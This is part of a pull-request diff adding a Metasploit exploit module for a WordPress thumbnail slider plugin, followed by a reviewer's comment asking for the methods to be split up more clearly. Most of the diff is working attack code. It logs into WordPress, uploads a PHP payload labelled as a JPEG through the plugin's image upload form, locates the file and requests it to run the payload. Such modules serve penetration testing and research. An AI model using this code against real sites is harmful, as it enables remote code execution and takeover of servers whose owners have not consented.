modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb

```diff
@@ -0,0 +1,158 @@
+    end
+
+    redirect_uri = normalize_uri(target_uri.path, 'wp-admin/')
+    cookies = res.get_cookies
+    wp_login_res = send_request_cgi(
+      'method'  =>  'POST',
+      'uri'     =>  wp_uri,
+      'cookie'  =>  cookies,
+      'vars_post' => {
+        'log' =>  datastore['USERNAME'],
+        'pwd' =>  datastore['PASSWORD'],
+        'wp-submit' =>  'Log In',
+        'redirect_to' => redirect_uri
+      }
+    )
+
+    auth_cookies = wp_login_res.get_cookies
+    auth_res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  redirect_uri,
+      'cookie'  =>  auth_cookies
+    )
+
+    return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_res && auth_res.body.include?("wpadminbar")
+
+    print_good("Logged into WordPress")
+    upload_payload(auth_cookies)
+  end
+
+  def upload_payload(cookies)
+    manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'
+    file_payload = get_write_exec_payload(:unlink_self => true)
+    file_name = "#{rand_text_alpha(5)}.php"
+
+    # attempt to access plugins page
+    plugin_res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(target_uri.path, manage_uri),
+      'cookie'  =>  cookies
+    )
+
+    unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
+      fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page")
+    end
+
+    data = Rex::MIME::Message.new
+    data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"")
+    data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"")
+    data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"")
+    post_data = data.to_s
+
+    # upload the file
+    upload_res = send_request_cgi(
+      'method'  =>  'POST',
+      'uri'     =>  normalize_uri(target_uri.path, manage_uri, '&action=addedit'),
+      'cookie'  =>  cookies,
+      'ctype'   =>  "multipart/form-data; boundary=#{data.bound}",
+      'data'    =>  post_data
+    )
+
+    page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies)
+    fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/)
+
+    retrieve_file(page, cookies)
+  end
+
+  def retrieve_file(res, cookies)
+    fname = res.body.scan(/slider\/(.*\.php)/).flatten[0]
+    fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil?
+    file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
+
+    print_good("Successful upload")
+    execute = send_request_raw(
+      'uri' => file_uri,
+      'method' => 'GET',
+      'cookie' => cookies
+    )
+  end
+
+  def exploit
+   unless check == Exploit::CheckCode::Safe
+     login
```

Comment:
This looks a little sparse. Any chance the methods can be split up better to show what's going on? There seems to be a lot of parameter passing.